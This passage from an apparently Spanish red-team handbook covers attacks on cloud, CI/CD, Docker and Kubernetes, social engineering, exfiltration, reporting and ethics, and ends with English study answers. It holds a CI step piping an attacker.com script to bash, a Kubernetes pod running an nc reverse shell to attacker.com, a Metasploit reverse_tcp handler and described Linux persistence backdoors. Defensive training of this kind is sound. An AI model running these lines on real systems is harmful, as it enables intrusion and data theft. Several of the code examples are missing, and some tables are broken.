● CloudTrail mal configurado:
○ Sin logs o con almacenamiento inseguro → invisibilidad del atacante.
Abusos en Azure
● Azure AD mal gestionado:
158
○ Usuarios con MFA deshabilitado.
○ Ataques de password spraying con herramientas como MSOLSpray.
● Aplicaciones registradas vulnerables:
○ Tokens JWT sin validación correcta.
○ API keys expuestas en repositorios.
● Role Assignment Abuses:
○ Un usuario con rol bajo puede escalar a Owner manipulando asignaciones de
roles.
● Azure Storage Accounts:
○ Exposición de blobs públicos con información sensible.
Ejemplo:
az storage blob list --account-name vulnerable --container-name public
○
Abusos en GCP
● Buckets de Google Storage:
○ Acceso público no intencionado.
Ejemplo:
gsutil ls gs://vulnerable-bucket
○
● Service Accounts sobreprivilegiadas:
○ Tokens reutilizables que permiten ejecutar comandos críticos.
○ Ataque clásico: Impersonación → asumir identidad de otra cuenta de servicio.
● Cloud Functions y Pub/Sub:
○ Inyección de código en funciones con validación débil.
○ Uso de Pub/Sub como canal de C2 (Command & Control).
● Stackdriver Logs inseguros:
○ Almacenamiento mal configurado que expone datos de auditoría.
159
Contramedidas
● Aplicar principio de mínimo privilegio (PoLP) en IAM.
● Monitorear configuraciones con herramientas como:
○ ScoutSuite (multi-cloud).
○ Prowler (AWS).
○ Azucar (Azure).
● Cifrar buckets y bases de datos por defecto.
● Activar MFA en todas las cuentas.
● Auditorías periódicas en GitHub, GitLab y repos internos para evitar secretos filtrados.
● Detección en tiempo real con SIEM y alertas de comportamiento anómalo.
Conclusión
El Red Team que sabe moverse en la nube entiende que los errores de configuración son más
peligrosos que un exploit 0-day. AWS, Azure y GCP concentran el tesoro dorado de las
corporaciones modernas: datos, identidades y servicios críticos.
El verdadero poder no está en romper el hierro de los servidores, sino en explotar la niebla mal
vigilada de la nube.
Capítulo 50
Introducción
En la era DevOps, el código es el nuevo rey y los pipelines de CI/CD son las arterias que lo
transportan. Jenkins, GitLab CI, GitHub Actions, CircleCI y Azure DevOps son utilizados para
automatizar pruebas, construir imágenes y desplegar aplicaciones. Pero con cada
automatización, aparecen grietas: credenciales hardcodeadas, runners inseguros, secretos
expuestos, validaciones deficientes.
Un Red Team que ataca un pipeline no necesita vulnerar el sistema final: basta con inyectar
veneno en la sangre antes de que llegue al corazón.
160
Superficie de ataque en CI/CD
1. Repositorios de código
○ Secretos en commits (.env, .pem, .kube/config).
○ Configuración débil en GitHub/GitLab (repos públicos con información interna).
○ Dependencias maliciosas (ataques de Dependency Confusion).
2. Servidores de integración (Jenkins, GitLab Runners, etc.)
○ Consolas expuestas sin autenticación fuerte.
○ Plugins vulnerables en Jenkins.
○ Runners con permisos excesivos en máquinas compartidas.
3. Almacenamiento de artefactos
○ Paquetes NPM, PyPI, Maven o contenedores Docker en registries inseguros.
○ Publicación sin firmas → permite sustitución de binarios.
4. Pipelines mal diseñados
○ No separación de entornos (dev, staging, prod).
○ Scripts que ejecutan comandos con sudo sin control.
○ Reutilización de tokens y claves SSH entre stages.
Técnicas de ataque
Un atacante que compromete el repo puede insertar código malicioso en el build script:
# .gitlab-ci.yml
build:
script:
- echo "Ejecutando build legítimo..."
- curl http://attacker.com/payload.sh | bash
161
En GitLab o GitHub Actions, los runners compartidos ejecutan jobs de múltiples proyectos. Si
no están aislados correctamente, un atacante puede:
La infiltración más sutil: comprometer una dependencia usada en el build. Ejemplo: publicar
un paquete NPM llamado lodash-extras que es descargado automáticamente en el pipeline.
Resultado: malware integrado en todas las builds.
Los registries de Docker a menudo carecen de autenticación. Un atacante puede inyectar una
imagen maliciosa con el mismo nombre que la oficial y esperar que sea descargada por el
pipeline.
Contramedidas
● Segregar entornos: dev, staging y prod deben tener pipelines y runners separados.
● Uso de runners dedicados y aislados, nunca compartidos en entornos sensibles.
● Escaneo de secretos con herramientas como trufflehog, gitleaks.
● Validar dependencias: usar repositorios internos y firmar paquetes.
● Firmado de imágenes y artefactos con Notary o Cosign.
● Principio de mínimo privilegio para variables y tokens en CI/CD.
● Monitoreo en tiempo real de pipelines con SIEM y alertas sobre anomalías.
162
Conclusión
La infraestructura de CI/CD es la columna vertebral de la empresa digital. Si un atacante
controla la cadena de build, controla cada servidor que reciba el software. Este capítulo revela
que los ataques más oscuros no siempre están en la red perimetral, sino en los engranajes
invisibles de la fábrica de código.
El Red Team furioso sabe que si envenena un pipeline, el enemigo se convierte en su propio
aliado, desplegando con orgullo el malware que lo destruirá.
Capítulo 51
Introducción
Docker y la contenerización cambiaron el mundo del software. Aplicaciones que antes requerían
complejas instalaciones ahora se ejecutan en imágenes ligeras, portables y replicables. Sin
embargo, esa portabilidad también es un arma de doble filo: si un atacante compromete un
contenedor, puede escalar desde un sandbox hasta la totalidad del host.
El Red Team no ve contenedores: ve jaulas mal cerradas donde cada grieta es un vector de
ataque.
163
4. Docker Daemon expuesto
○ API de Docker abierta en tcp://0.0.0.0:2375.
○ Permite ejecutar contenedores arbitrarios con permisos de administrador.
1. Docker Escape
Si un contenedor mal configurado corre como root y tiene acceso al socket de Docker, el
atacante puede controlar el host.
Ejemplo:
Este comando monta el sistema de archivos del host y lo abre como si fuera un chroot.
Resultado: acceso root al servidor físico.
2. Poisoning de imágenes
Pero en realidad no es la oficial, sino una versión troyanizada. Cada despliegue de esa imagen
replica la intrusión.
Con acceso al daemon remoto (2375 abierto), el atacante puede lanzar un contenedor con
montajes peligrosos:
4. Volúmenes sensibles
164
Si el contenedor tiene montado /var/run/docker.sock, el atacante puede controlarlo y
lanzar nuevos contenedores comprometidos.
Contramedidas
● No correr contenedores como root. Usar usuarios restringidos en Dockerfile.
● Nunca exponer el socket de Docker. Si se necesita, proteger con TLS.
● Escanear imágenes con herramientas como Trivy, Clair, Anchore.
● Usar imágenes mínimas (Alpine, distroless).
● Verificar firmas de imágenes antes de desplegar.
● Segregar redes internas de contenedores.
● Monitorear runtime con Falco o Sysdig.
● Aplicar AppArmor/SELinux para aislar contenedores.
Conclusión
Los contenedores nacieron como promesa de aislamiento, pero en manos del Red Team se
convierten en trampas perfectas. Un solo descuido —un contenedor en modo root, un volumen
mal montado, una imagen troyanizada— es suficiente para que el atacante desangre la
infraestructura completa.
165
Capítulo 52
Introducción
Kubernetes (K8s) es el cerebro de la infraestructura moderna: decide dónde se ejecutan los
pods, gestiona redes, secretos y balanceadores de carga. En teoría, su diseño promueve
seguridad y escalabilidad. En la práctica, configuraciones débiles, clusters expuestos y DevOps
descuidados convierten al orquestador en una mina de oro para el atacante.
Un Red Team que logra comprometer un cluster no solo gana control sobre los contenedores:
gana el control absoluto del tejido nervioso que mantiene viva la empresa.
166
1. Acceso al API Server
Conseguir un token de servicio o un certificado puede dar control completo del cluster.
Ejemplo: listar todos los pods en todos los namespaces:
cat /var/run/secrets/kubernetes.io/serviceaccount/token
apiVersion: v1
kind: Pod
metadata:
name: evil-pod
spec:
containers:
- name: backdoor
image: alpine
command: ["/bin/sh","-c"]
args: ["while true; do nc -e /bin/sh attacker.com 4444; done"]
167
El almacenamiento etcd guarda toda la información del cluster. Si no está cifrado:
Contramedidas
● Seguridad en la API: nunca exponer el API Server a Internet, usar certificados válidos y
autenticación robusta.
● Configurar RBAC con privilegios mínimos por rol y namespace.
● Cifrado de secrets en etcd y rotación periódica.
● Network Policies estrictas para limitar el tráfico entre pods.
● Restricciones de admisión (OPA Gatekeeper, Kyverno) para evitar pods peligrosos.
● Auditoría y monitoreo constante del API Server y pods con Falco, kube-hunter, Sysdig.
● Seguridad en el supply chain: revisar charts de terceros, firmar imágenes, escanear
manifests.
Conclusión
Kubernetes es el imperio de la nube. Allí convergen los contenedores, los secretos, las redes y
las aplicaciones. Pero incluso el imperio más poderoso puede caer si el Red Team descubre un
rol mal configurado, un API expuesto o un secreto mal protegido.
168
En el campo de batalla del siglo XXI, quien controla el cluster controla el universo digital de
su enemigo.
Capítulo 53
Introducción
No importa cuán blindadas estén las máquinas, el eslabón más débil siempre es el humano.
El Social Engineering Toolkit (SET), creado por Dave Kennedy (TrustedSec), fue concebido para
automatizar ataques de ingeniería social que de otro modo requerirían mucho esfuerzo
manual.
SET es el carnicero digital que convierte al Red Team en un ilusionista: phishing masivo,
clonado de sitios, ataques de credenciales, payloads incrustados en correos. Lo que antes
tomaba días, ahora puede ejecutarse en minutos.
En este capítulo vamos a ver cómo un Red Team opera SET en escenarios reales, pasando
de lo conceptual a lo operativo.
169
Uso operativo de SET
SET se lanza directamente desde Kali Linux:
setoolkit
Menú principal:
1. Social-Engineering Attacks
2. Penetration Testing (Fast-Track)
3. Third Party Modules
4. Update SET
5. Help, Credits, About
Opciones:
170
3. Infectious Media Generator
Crea archivos USB/CD/DVD con payloads incrustados. Ejemplo: un PDF que en realidad abre
una reverse shell al atacante.
4. Payloads y Metasploit
SET se integra con Metasploit Framework. Cuando una víctima abre un adjunto o visita un sitio,
SET activa un listener:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
exploit
Contramedidas
● Concienciación: entrenar a empleados para detectar phishing.
● 2FA obligatorio: incluso con credenciales robadas, se bloquea el acceso.
● Correo seguro: filtrar spoofing con SPF, DKIM, DMARC.
● Monitoreo proactivo: SIEM detectando intentos de login masivos.
● Seguridad web: detectar clonado con certificados TLS y reportar dominios falsos.
Conclusión
171
El Social Engineering Toolkit es el teatro de operaciones del hacker social. Su poder no está
en la tecnología, sino en la capacidad de disfrazar ataques como si fueran gestos cotidianos: un
correo, un login, un archivo.
En manos del Red Team, SET convierte la debilidad humana en el vector de ataque más
efectivo. Y en el campo de batalla moderno, no hay firewall ni IDS que bloquee la
manipulación psicológica.
Capítulo 54
Introducción
Comprometer un sistema es apenas la mitad de la batalla. El verdadero valor para un Red Team
está en extraer información sensible: contraseñas, bases de datos, propiedad intelectual,
correos internos, registros financieros. Sin embargo, toda red corporativa moderna está plagada
de IDS, DLP, SIEM y firewalls de última generación vigilando la salida de datos.
Aquí es donde entra el arte oscuro de la exfiltración encubierta: disfrazar, fragmentar o tunelar
la información robada para que parezca tráfico legítimo, como si los secretos viajaran
camuflados en el ruido digital de la red.
172
Técnicas avanzadas del Red Team
3. Steganografía digital
173
Exfiltrar datos hacia Dropbox, Google Drive o OneDrive disfrazados como respaldos. Ejemplo
con rclone:
Contramedidas
● Monitoreo de tráfico DNS: detectar patrones anormales (consultas largas o excesivas).
● Inspección profunda de paquetes (DPI): identificar túneles ICMP y HTTP
sospechosos.
● Limitación de protocolos: bloquear ICMP hacia Internet, restringir tráfico DNS a
servidores internos.
● Detección de steganografía: análisis forense de imágenes y archivos multimedia.
● Alertas en transferencias cloud: detectar volúmenes inusuales hacia Dropbox/Drive.
● Data Loss Prevention (DLP): inspeccionar archivos salientes en busca de contenido
sensible.
Conclusión
La exfiltración es el último acto del Red Team, el golpe maestro que transforma un acceso en
una filtración devastadora. La clave no está solo en robar datos, sino en hacerlos desaparecer
sin dejar rastro, camuflados en el ruido digital cotidiano.
Un Red Team que domina la exfiltración encubierta puede operar en la sombra durante meses,
drenando la sangre vital de una organización mientras sus defensas miran hacia otro lado.
174
Capítulo 55
Introducción
Mientras el Red Team despliega exploits y pivoteos, los ojos del Blue Team vigilan. Firewalls,
IDS, EDR y SIEM registran cada byte sospechoso. Sin embargo, existe un terreno en el que los
defensores suelen ser ciegos: el de los canales encubiertos y la esteganografía.
Tipos principales
1. Basados en almacenamiento
○ Los datos se escriben en atributos poco visibles:
■ Metadatos de archivos (author, comment).
■ Bits ocultos en documentos PDF o Word.
■ Flags en protocolos de red que parecen inofensivos.
2. Basados en tiempo (Timing Channels)
○ El atacante modula datos según el tiempo entre paquetes.
○ Ejemplo:
■ 100 ms = bit 0
■ 200 ms = bit 1
○ Muy difícil de detectar, salvo con monitoreo de tráfico de alta precisión.
175
● HTTPTunnel → Convierte peticiones HTTP en vehículos de información oculta.
● Cloakify → Convierte datos en listas aparentemente inofensivas (por ejemplo,
ingredientes de recetas o direcciones IP).
Esteganografía
La esteganografía es el arte de ocultar datos dentro de otros archivos: imágenes, audios,
videos o incluso en el propio código.
176
2. Lo cifra y lo fragmenta en bloques de 256 KB.
3. Inserta cada fragmento dentro de imágenes .jpg de la intranet usando steghide.
4. Los sube a un servicio público como redes sociales corporativas o almacenamiento en la
nube.
5. Semanas después, descarga esas imágenes desde otra ubicación y reconstruye el
archivo completo.
A ojos del Blue Team, fue solo un usuario cargando fotos a la nube.
Contramedidas
Conclusión
Los canales encubiertos y la esteganografía son el equivalente digital de contrabando en
doble fondo: los defensores revisan la carga, pero el secreto está escondido donde no miran.
Para el Red Team, dominarlos significa mover información silenciosamente y sin huellas. Para
el Blue Team, detectarlos es una pesadilla que requiere precisión quirúrgica.
Capítulo 56
Introducción
177
Un Red Team sin reportes es como un ladrón que nunca cuenta cómo entró. El informe final es
la herramienta que conecta el mundo de la ofensiva con el de la defensa. No se trata de humillar
al cliente ni de lucirse con capturas oscuras: se trata de traducir el caos del ataque en
lecciones prácticas y accionables para el Blue Team y la dirección de la empresa.
El reporte es tanto arma como espejo: muestra la crudeza del ataque, pero también ilumina las
rutas de mejora.
Tipos de reportes
1. Ejecutivo (High Level)
○ Pensado para directivos y responsables no técnicos.
○ Lenguaje claro, sin jerga, con foco en impacto de negocio.
○ Responde: ¿qué significa esto para la empresa?
2. Técnico (Deep Dive)
○ Dirigido al Blue Team, SOCs y administradores.
○ Incluye pasos detallados, comandos, evidencias y posibles indicadores de
compromiso (IoCs).
○ Responde: ¿cómo entraron y cómo se corrige?
3. Timeline operativo
○ Una narrativa cronológica de la intrusión: desde el reconocimiento hasta la
exfiltración.
○ Útil para que los defensores entrenen en detección temprana.
Sección Contenido
178
Recomendaciones Pasos claros para mitigar cada hallazgo.
Evidencia:
curl -X GET http://target.com/admin
● Devolvió información sensible: lista de usuarios y hashes de contraseñas.
● Impacto: Acceso no autorizado a información confidencial, con riesgo de escalada
lateral.
● Recomendación:
○ Implementar autenticación robusta (OAuth2 o JWT).
○ Revisar políticas de exposición de endpoints.
○ Implementar WAF para mitigar intentos similares.
● IoCs: Peticiones GET a /admin desde IPs externas.
● Oscuro pero claro → debe mostrar la crudeza del ataque sin tecnicismos innecesarios
para los ejecutivos.
● Implacable pero constructivo → señalar fallas graves sin arrogancia, siempre
ofreciendo caminos de mejora.
● Narrativo pero detallado → contar la historia del ataque como una novela negra, pero
con pruebas forenses en cada página.
179
El equipo realiza una simulación y logra exfiltrar 2 GB de datos desde la red interna. En el
reporte ejecutivo, se informa:
"La operación demostró que un atacante externo podría acceder a datos críticos de clientes en
menos de 48 horas, lo que representa un riesgo directo de sanciones regulatorias y pérdida de
reputación".
Conclusión
Los exploits, los payloads y el pivoting son la adrenalina del Red Team. Pero el verdadero valor
nace en el reporte: ahí es donde el ataque se convierte en conocimiento, el caos en
enseñanza, y el hacker en asesor estratégico.
Capítulo 57
180
Introducción
El Red Team camina en una frontera peligrosa: la del atacante y el auditor. Una operación
profesional exige guardar registro de cada hallazgo, explotación y resultado, pero hacerlo
de forma torpe puede transformarte en tu propio verdugo. Si un reporte parece una confesión
criminal, entonces has fallado como profesional. El secreto está en documentar con
precisión, claridad y ética, sin poner en riesgo tu libertad ni la reputación del equipo.
El peligro de la autoincriminación
Muchos Red Teamers novatos creen que el reporte debe mostrar todos los detalles “con estilo
underground”, incluyendo frases como:
181
○ Marca la frontera entre un ataque criminal y una simulación ética.
3. Documenta el hallazgo, no el ego
○ El reporte no es para presumir, sino para informar.
○ La evidencia debe mostrar la vulnerabilidad, no glorificar la intrusión.
4. Limita el detalle cuando no aporta
○ No incluyas “recetas criminales” innecesarias.
○ Describe vectores y pruebas sin dar manuales completos de explotación.
5. Incluye disclaimers legales
○ Cada hallazgo debe estar acompañado de frases como:
■ “La explotación se realizó en el marco autorizado del contrato de
pruebas.”
■ “No se accedió ni almacenó información fuera del alcance definido.”
Conclusión
Un buen Red Teamer no solo sabe hackear: también sabe contar la historia del ataque sin
convertirse en protagonista legal de un caso penal. La clave está en documentar hallazgos
como pruebas técnicas objetivas, nunca como relatos personales de hazañas.
182
Recordemos: el Red Team desaparece en la sombra. Lo único que debe quedar como rastro es
un reporte limpio, claro, y libre de incriminación.
Capítulo 58
Introducción
El Red Team vive en un terreno ambiguo: sus herramientas son las del criminal, pero su misión
es proteger. La paradoja es que los métodos oscuros se emplean con un objetivo luminoso:
reforzar la seguridad. Sin embargo, el filo entre lo permitido y lo ilegal es tan fino como una
navaja. Un paso en falso puede transformar al profesional en delincuente.
Este capítulo aborda los marcos legales, la ética hacker y la responsabilidad profesional.
Porque en el hacking, no basta con saber explotar: hay que saber cuándo parar, qué no tocar
y cómo justificar cada acción.
Ejemplo real: un pentester en EE. UU. terminó arrestado por entrar físicamente a un edificio
dentro de un contrato mal redactado. El cliente negó haber autorizado ese alcance. Resultado:
Red Teamer esposado y tratado como intruso.
183
Principios de ética en Red Team:
El filo de la navaja
Un Red Teamer opera en un espacio donde:
184
● Caso 2: El cliente negligente Tras el reporte, el cliente decide no corregir nada. El Red
Teamer sabe que los datos están expuestos. ¿Divulgarlo públicamente?
○ Ética → no. La confidencialidad es absoluta.
● Caso 3: El reto personal El operador descubre que puede pivotar más allá del alcance,
solo por diversión.
○ Ética → detenerse. “Poder” no significa “deber”.
Conclusión
El Red Team vive en el filo de la navaja: un lado es la gloria profesional, el otro la ruina legal.
Solo la ética y el marco legal sólido permiten caminar sin caer.
Recordemos: el verdadero hacker no es quien explota vulnerabilidades, sino quien sabe cuándo
no hacerlo.
Capítulo 59
Introducción
El hacking ético a menudo se percibe como una danza en teoría, llena de comandos y exploits
en laboratorio. Pero el verdadero Red Teaming cobra vida cuando se enfrenta a entornos vivos,
hostiles y protegidos por defensas reales. Cada caso que veremos aquí no es solo una
prueba técnica: es un recordatorio de que los humanos, las políticas y la psicología importan
tanto como las herramientas.
185
Caso 1: La puerta olvidada del banco
Un banco multinacional contrató un Red Team para evaluar su seguridad. Tras semanas de
escaneo, todo parecía fortificado. Firewalls actualizados, IDS configurados, WAF blindando
aplicaciones web. El Red Team cambió de ángulo: ingeniería social física.
Metodología:
186
● El Blue Team no detectó la intrusión hasta el informe final.
El impacto psicológico fue brutal: la dirección comprendió que no era cuestión de si serían
atacados, sino de cuándo.
Durante la operación, los pentesters lanzaron pruebas que saturaron los servidores productivos.
El servicio cayó durante 3 horas, provocando pérdidas millonarias.
El cliente, furioso, demandó al equipo. El caso terminó en tribunales. Este ejemplo se convirtió
en una advertencia global: el alcance mal definido es un arma contra el propio Red Team.
Comparación de casos
187
Gobiern USBs maliciosos Exfiltración de datos El usuario siempre es la
o víctima más fácil
Telecom DoS mal gestionado Caída del servicio Alcance legal es vital
Conclusión
Estos casos demuestran que el Red Team no es solo una cuestión de exploits técnicos, sino de
estrategia, psicología y precisión quirúrgica. Un ataque puede empezar con un mail
inocente, un USB o una caja de herramientas. Lo importante no es solo demostrar que el ataque
es posible, sino entregar al cliente la visión brutal de su fragilidad.
Capítulo 60
La travesía oscura
Un hacker ético que decide recorrer el camino del Red Team no solo se enfrenta a firewalls,
contraseñas y servidores. Se enfrenta a personas, empresas, gobiernos y a sí mismo. Cada
simulación, cada phishing, cada intrusión es un espejo que muestra la fragilidad humana y
tecnológica.
La “biblia negrísima” no es solo un compendio de técnicas, sino un rito iniciático. Quien la lee
con profundidad entiende que el poder del conocimiento ofensivo no está en “poder entrar”, sino
en saber cuándo detenerse.
● Por un lado, aprende a destruir. Sabe cómo desangrar una Wi-Fi, exfiltrar gigas de
datos o tumbar un servicio en segundos.
● Por otro lado, crea seguridad. Cada puerta que fuerza es un aviso, cada debilidad
expuesta es una oportunidad para blindar.
El viaje al lado negrísimo enseña que el bien y el mal son contextuales: la misma técnica que
roba identidades puede salvar vidas en un hospital si se reporta a tiempo.
El ego y la humildad
El Red Teamer principiante sueña con hazañas: romper firewalls, humillar a los Blue Teams, ser
el “más 1337”. Pero el viaje enseña otra cosa:
189
El viaje resumido
Casos reales El mundo sangra igual que el Cada error tiene un precio humano
laboratorio
El epílogo inevitable
El lado negrísimo del Ethical Hacker no es el de la ilegalidad, sino el del conocimiento
absoluto. Saber que podrías entrar, destruir, manipular… y elegir no hacerlo.
El Red Teamer auténtico camina en la sombra pero trabaja para la luz. Cada payload que
diseña, cada phishing que ejecuta, cada exploit que domina, no es un acto de maldad sino de
advertencia. Porque en el mundo real, siempre habrá alguien dispuesto a usar las mismas
armas para devorar empresas, robar identidades y quebrar sociedades.
El hacker ético es la paradoja encarnada: oscuro por dentro, pero imprescindible por fuera.
Conclusión final
Esta biblia termina aquí, pero el viaje no. Quien la haya leído y practicado habrá descubierto que
el hacking no es un fin, sino un camino: un viaje al lado negrísimo que solo los más disciplinados
saben recorrer sin perderse.
190
Si llegaste hasta aquí, recuerda:
191
Mimikatz plays a dual role by both revealing significant security risks through its ability to extract sensitive credentials from memory and posing a potential threat if misused by malicious actors. Organizations can defend against Mimikatz by implementing strategies such as using Credential Guard to isolate and protect the LSASS process, limiting unnecessary administrative privileges, ensuring regular monitoring and logging of suspicious activities especially those related to LSASS access, and applying frequent password rotation practices to mitigate the impact of exposed credentials .
A Red Team member must adhere to key ethical principles such as obtaining explicit authorization before conducting any activities, ensuring proportionality by not exploiting vulnerabilities beyond what is necessary to demonstrate a risk, causing no harm by not altering, deleting, or corrupting client data, maintaining strict confidentiality of all findings under a Non-Disclosure Agreement (NDA), and exercising social responsibility by not using their knowledge for personal gain or against third parties .
Ethical considerations guide the balance between offensive security testing and legal compliance by emphasizing the importance of clear, written authorization and scope definition before beginning any engagement. Ethical guidelines focus on minimizing disruption, preventing collateral damage, maintaining confidentiality, and acting within legal parameters. Red Team members must avoid exceeding their authorized scope, ensure no harm comes to the client systems, and report findings responsibly to avoid legal repercussions while achieving security goals .
Social engineering techniques in Red Team exercises exploit human vulnerabilities by manipulating individuals to gain unauthorized access or information. Techniques such as phishing, pretexting, and baiting can effectively bypass technical security controls by targeting the weakest link in the security chain: the human. These exercises reveal specific areas of user susceptibility and highlight the necessity of robust security awareness training and protocols to prevent exploitation .
Using Veil for payload generation allows offensive security teams to create payloads that evade detection by antivirus software through techniques like code obfuscation, encryption, and creating custom loaders. While this enhances stealth, modern defenses counteract such techniques with behavioral analysis that detects unusual patterns, leveraging machine learning to identify anomalies, deploying endpoint detection and response (EDR) solutions that monitor execution paths, and enforcing strict security policies .
Persistence is crucial in Red Teaming as it ensures continued access to a system despite reboots or security measures. In Linux systems, persistence can be achieved through methods such as inserting malicious SSH keys into the `authorized_keys` file for backdoor access, creating cron jobs to execute payloads at regular intervals, setting up new systemd services that run malicious binaries, and using LD_PRELOAD to inject malicious code during process execution .
A Red Team operator’s ethical responsibility when simulating real cyber threats involves ensuring all actions are conducted within the constraints of permission and with the intent only to improve the client’s defenses. This requires maintaining honesty, transparency, and integrity, and refraining from exploiting discovered vulnerabilities for personal gain. The operator must continuously assess the impact of their actions to prevent unintended harm and handle sensitive data with the utmost confidentiality, operating as a trusted advisor .
Challenges stemming from psychological aspects in Red Team operations include potential antagonism from the Blue Team, who might perceive Red Team efforts as adversarial rather than collaborative. There can also be misunderstandings about the goals and methods of Red Team activities, leading to mistrust or resistance from clients. Effective communication, transparency, and education on the value of Red Team insights are crucial in overcoming these challenges by ensuring that all stakeholders understand the ultimate goal of strengthening overall security .
The operational philosophy of a Red Team is centered around simulating real-world cyber threats to test the defensive capabilities of an organization. Key principles include thinking like a real attacker to anticipate possible attack vectors and motivations, breaking technical but not legal boundaries as defined by explicit authorization, continuously learning from errors and vulnerabilities found to strengthen defenses, and remaining as undetectable as possible to mirror realistic threat scenarios. This approach helps identify weaknesses within systems, processes, and personnel without causing actual harm .
Nmap's advanced scanning capabilities provide strategic advantages in Red Team operations by allowing detailed network reconnaissance and analysis. Techniques such as SYN scans (stealth scan), UDP scans, service and version detection, and OS fingerprinting help detect services and potential vulnerabilities with precision and stealth. The use of Nmap Scripting Engine (NSE) further enhances these capabilities with automated scripts for vulnerability detection and limited exploitation, allowing Red Team members to gather critical information without being detected .